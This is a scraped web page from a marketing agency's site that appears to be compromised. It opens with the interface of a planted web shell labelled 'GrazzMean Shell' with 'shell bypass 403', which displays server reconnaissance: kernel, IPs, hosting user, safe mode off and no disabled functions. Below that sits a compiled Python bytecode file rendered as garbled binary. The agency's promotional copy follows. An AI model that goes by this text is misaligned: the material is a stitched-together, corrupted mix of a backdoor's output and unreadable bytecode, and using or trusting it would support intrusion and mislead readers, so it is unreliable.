404 Not Found


nginx
beegazpacho.com - GrazzMean
shell bypass 403

GrazzMean Shell

Uname: Linux in-mum-web1557.main-hosting.eu 5.14.0-503.35.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 4 05:23:43 EDT 2025 x86_64
Software: LiteSpeed
PHP version: 8.2.30 [ PHP INFO ] PHP os: Linux
Server Ip: 91.108.106.40
Your Ip: 216.73.216.168
User: u848900432 (848900432) | Group: o51372345 (1051372345)
Safe Mode: OFF
Disable Function:
NONE

name : _propertyhelper.cpython-39.opt-1.pyc
a

b�^S7�@s�ddlmZddlmZmZmZmZmZmZm	Z	m
Z
mZmZm
Z
mZmZmZmZmZmZmZmZmZmZmZmZmZejZejZejZejZejZej Z ej!Z!ej"Z"Gdd�de#�Z$dd�Z%dS)�)�_gi)�	TYPE_NONE�TYPE_INTERFACE�	TYPE_CHAR�
TYPE_UCHAR�TYPE_BOOLEAN�TYPE_INT�	TYPE_UINT�	TYPE_LONG�
TYPE_ULONG�
TYPE_INT64�TYPE_UINT64�	TYPE_ENUM�
TYPE_FLAGS�
TYPE_FLOAT�TYPE_DOUBLE�TYPE_STRING�TYPE_POINTER�
TYPE_BOXED�
TYPE_PARAM�TYPE_OBJECT�
TYPE_PYOBJECT�
TYPE_GTYPE�	TYPE_STRV�TYPE_VARIANTc@sJeZdZdZeeeeee	e
eee
iZedededeee	eeeeeediZeeeeededeee	eeeeeiZedededededededede	di	ZGdd	�d	e �Z!d
d
d
d
dde"j#d
d
f	dd�Z$d
d�Z%dd�Z&dd�Z'dd�Z(dd�Z)dd�Z*dd�Z+dd�Z,dd�Z-dd �Z.d!d"�Z/d#d$�Z0d%d&�Z1d'd(�Z2d)d*�Z3d+d,�Z4d
S)-�Propertya�Creates a new Property which when used in conjunction with
    GObject subclass will create a Python property accessor for the
    GObject ParamSpec.

    :param callable getter:
        getter to get the value of the property
    :param callable setter:
        setter to set the value of the property
    :param type type:
        type of property
    :param default:
        default value, must match the property type.
    :param str nick:
        short description
    :param str blurb:
        long description
    :param GObject.ParamFlags flags:
        parameter flags
    :keyword minimum:
        minimum allowed value (int, float, long only)
    :keyword maximum:
        maximum allowed value (int, float, long only)

    .. code-block:: python

         class MyObject(GObject.Object):
             prop = GObject.Property(type=str)

         obj = MyObject()
         obj.prop = 'value'

         obj.prop  # now is 'value'

    The API is similar to the builtin :py:func:`property`:

    .. code-block:: python

        class AnotherObject(GObject.Object):
            value = 0

            @GObject.Property
            def prop(self):
                'Read only property.'
                return 1

            @GObject.Property(type=int)
            def propInt(self):
                'Read-write integer property.'
                return self.value

            @propInt.setter
            def propInt(self, value):
                self.value = value
    �l����l����l�����gc@seZdZdd�ZdS)zProperty.__metaclass__cCsdS)Nz<class 'GObject.Property'>���selfrr�8/usr/lib64/python3.9/site-packages/gi/_propertyhelper.py�__repr__�szProperty.__metaclass__.__repr__N)�__name__�
__module__�__qualname__r"rrrr!�
__metaclass__�sr&Nc

Cs4d|_|durt}|�|�|_|�|�|_|��t|t�sDt	d��||_
t|t�s\t	d��||_||_||_
|r~|s~|j}n$|r�|s�|j}n|s�|s�|j}|j}|�|�||_|dur�||��kr�t	d|j|��f��n|��}||_|	du�r|	|��k�r$t	d|j|��f��n|��}	|	|_d|_dS)Nznick must be a stringzblurb must be a stringz+Minimum for type %s cannot be lower than %dz,Maximum for type %s cannot be higher than %d)�name�object�_type_from_python�type�_get_default�default�_check_default�
isinstance�str�	TypeError�nick�blurb�__doc__�flags�_readonly_setter�_writeonly_getter�_default_getter�_default_setter�getter�fset�_get_minimum�minimum�_get_maximum�maximum�_exc)
r r9�setterr*r,r1r2r4r<r>rrr!�__init__�sT


��
��zProperty.__init__cCsd|jp
d|jjfS)Nz<GObject Property %s (%s)>z(uninitialized))r'r*rrrr!r"�s�zProperty.__repr__cCs6|dur|Sd|_|�|�}|jr2|j}d|_|�|S�N)r?�fget)r �instance�klass�value�excrrr!�__get__�s
zProperty.__get__cCs:|durt�d|_|�|j|�|jr6|j}d|_|�dSrB)r0r?Zset_propertyr')r rDrFrGrrr!�__set__�szProperty.__set__cCs
|�|�S)z;Allows application of the getter along with init arguments.)r9�r rCrrr!�__call__�szProperty.__call__cCs |jr|j|_|j|_||_|S)z8Set the getter function to fget. For use as a decorator.)r3r2rCrJrrr!r9�s
zProperty.gettercCs||_|js|jj|_|S)z8Set the setter function to fset. For use as a decorator.)r:r'rCr#)r r:rrr!r@�s
zProperty.settercCs�||jvr|j|St|t�rBt|tjtjtjtjtj	f�rB|j
S|ttt
ttttttttttttttttttt fvrz|St!d|f��dS)NzUnsupported type: %r)"�_type_from_pytype_lookupr.r*�
issubclassrZGObjectZGEnumZGFlagsZGBoxedZ
GInterface�	__gtype__rrrrrr	rr
rrr
rrrrrrrrrrrr0)r �type_rrr!r)�s(


��
�zProperty._type_from_pythoncCs|dur|S|j�|jd�SrB)�_default_lookup�getr*)r r,rrr!r+
szProperty._get_defaultcCsz|j}|j}|tkr.|dvr.td|f���nH|tkrJ|durFtd���n,|tkrf|durbtd���n|�t�r�|dur�td��n t�	|��|�s�td||f��n�|�t
�r�t�	|��|�s�td||f��n�|�t��r2|du�r2t|t
��stdt|���|D](}t|�ttfv�rtd	t|����qnD|�t��rv|du�rvt|d
��rft�	|��t��svtd||f��dS)N)TFz%default must be True or False, not %rz)object types does not have default valuesz(GType types does not have default valuesz%enum properties needs a default valuez'enum value %s must be an instance of %rz(flags value %s must be an instance of %rzStrv value %s must be a listz'Strv value %s must contain only stringsrNz*variant value %s must be an instance of %r)r*r,rr0rr�is_arrZGTyperrr.�list�reprr/�bytesr�hasattr)r �ptyper,�valrrr!r-sF�

�
��zProperty._check_defaultcCs|j�|jd�SrB)�_min_value_lookuprQr*rrrr!r;3szProperty._get_minimumcCs|j�|jd�SrB)�_max_value_lookuprQr*rrrr!r=6szProperty._get_maximumcCst|d|j|�dS�NZ_property_helper_)�setattrr'�r rDrFrrr!r8=szProperty._default_settercCst|d|j|j�Sr[)�getattrr'r,�r rDrrr!r7@szProperty._default_gettercCstd|jt|�jf�|_dS)Nz%s property of %s is read-only�r0r'r*r#r?r]rrr!r5Cs�zProperty._readonly_settercCstd|jt|�jf�|_dS)Nz%s property of %s is write-onlyr`r_rrr!r6Gs�zProperty._writeonly_getterc	Cs�|j}|ttttttttfvr0|j	|j
|jf}nl|tks^|t
ks^|�t�s^|�t�s^|�t�rh|jf}n4|ttfvrzd}n"|�t�s�|�t�r�d}nt|��|j|j|jf||jfS)Nr)r*rr	r
rrr
rrr<r>r,rrrRrrrrrrr�NotImplementedErrorr1r2r4)r rW�argsrrr!�get_pspec_argsOs&
����
zProperty.get_pspec_args)5r#r$r%r3�intr�boolr�floatrr/rr(rrLr	rr
r�
G_MAXFLOAT�G_MAXDOUBLE�G_MININTr
�	G_MINLONGrrY�	G_MAXUINT�
G_MAXULONG�G_MAXINT�	G_MAXLONGrZrPr*r&rZPARAM_READWRITErAr"rHrIrKr9r@r)r+r-r;r=r8r7r5r6rcrrrr!r'sp7�	�
���
8
	
!rcs��j�di�}g}�j��D]b\}}t|t�r|js:||_|j|vrf||j|��krXqtd|j��|��||j<|�|�q|s�dS|�_	d�jvs�d�jvr�|D],}|j
|jks�|j|j
kr�td�jf��q�dd�}|�_�fd	d
�}|�_dS)z�
    Scans the given class for instances of Property and merges them
    into the classes __gproperties__ dict if it exists or adds it if not.
    �__gproperties__z0Property %s was already found in __gproperties__N�do_get_property�do_set_propertyzGObject subclass %r defines do_get/set_property and it also uses a property with a custom setter or getter. This is not allowedcSs|j�dd�}t||d�S�N�-�_)r'�replacer^)r �pspecr'rrr!�obj_get_property�sz,install_properties.<locals>.obj_get_propertycs.|j�dd�}t�|d�}|r*|�||�dSrr)r'rur^r:)r rvrFr'�prop��clsrr!�obj_set_property�sz,install_properties.<locals>.obj_set_property)�__dict__rQ�itemsr.rr'rc�
ValueError�appendrorCr7r:r8r0r#rprq)rzZgpropertiesZpropsr'rxrwr{rryr!�install_propertiesbs6

��r�N)&rrZ
_constantsrrrrrrr	r
rrr
rrrrrrrrrrrrrrgrhrirmrkrjrnrlr(rr�rrrr!�<module>sh=
© 2026 GrazzMean
Beegazpacho


Let’s  Start  Your  Online  Journey  with  Beegazpacho 

Welcome to Beegazpacho,
where creativity meets strategy,
and innovation drives success.


Contact
Now


OUR CLIENTS

WhatsApp-Image-2021-12-06.png
Untitled-design-11.png
niaf-logo.png
20220406-163308-scaled.jpg
karchi-logo.png
20220405-171252.png
20220405-171309.png
20220321-161603.png
20220321-161611.png
20220321-161628.png
20220321-161244.png
20220321-161256.png
20220321-161450.png
20220321-161205.png
20220226-170222.png
20220321-161051.png
20211202-170852.png
Untitled-design-9
pidilite-png-logo-colour
logo-black-e1706125740216-qisosldqhzgcaerhdt6n4t3m4s50jr0iik48z0h5vk
Fraikin-Dayim-logo-1
hpcl-logo-2-1
services

Transforming Ideas into
Success

.01
Digital Marketing

We drive growth through data-driven strategies and cutting-edge techniques.

Learn More

.02
SEO

Improve your online visibility and rank higher on search engines with our expert SEO services.

Learn More

.03
Website Designing

We design websites that are not only visually stunning but also user-centric, ensuring seamless navigation and enhanced user experience.

Learn More

.04
App Development

Our apps are crafted to be intuitive, engaging, and functional, providing your users with an exceptional mobile experience.

Learn More

.05
Social Media Ads

Target the right audience with precision and creativity to maximize engagement and conversions.

Learn More

.06
Google Ads

Maximize ROI with precision-targeted campaigns on Google’s powerful ad platform.

Learn More

.07
Google My Business

Optimize your local presence with strategies that put your business on the map and attract more customers.

Learn More

.08
Graphic Designing

Our designs tell your brand’s story in a visually compelling way.

Learn More

.09
3D Videos

Bring your product to life with immersive and dynamic 3D explainer videos.

Learn More

about BEEGAZPACHO

creating special Things
For special brands

Join the ranks of successful brands by partnering with Beegazpacho

00+

Happy Customer

00+

Continents

Our vision is not just to be a service provider but to be your partner in growth. We see ourselves as an extension of your team, working tirelessly to ensure that your brand not only meets its goals but surpasses them.

Explore
more

Our Recent Work

Crafted with Passion and Precision

Connect now


Web Design
Design, Development & Identity

Logo Design
Design, Development & Identity

Creative Brand design
Design, Development & Identity

Product Design Marketing
Design, Development & Identity

DIGITAL MARKETING
SEO
WEBSITE DESIGNING
APP DEVELOPMENT
SOCIAL MEDIA ADS
GOOGLE ADS
GOOGLE MY BUSINESS
GRAPHIC DESINING
3D VIDEOS
Client Stories

Hear It from Those Who Know Us Best

Our clients’ success stories speak volumes about our commitment to excellence. Don’t just take our word for it—hear directly from the brands we’ve partnered with. Their testimonials highlight our ability to bring visions to life and create a lasting impact on their businesses.

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors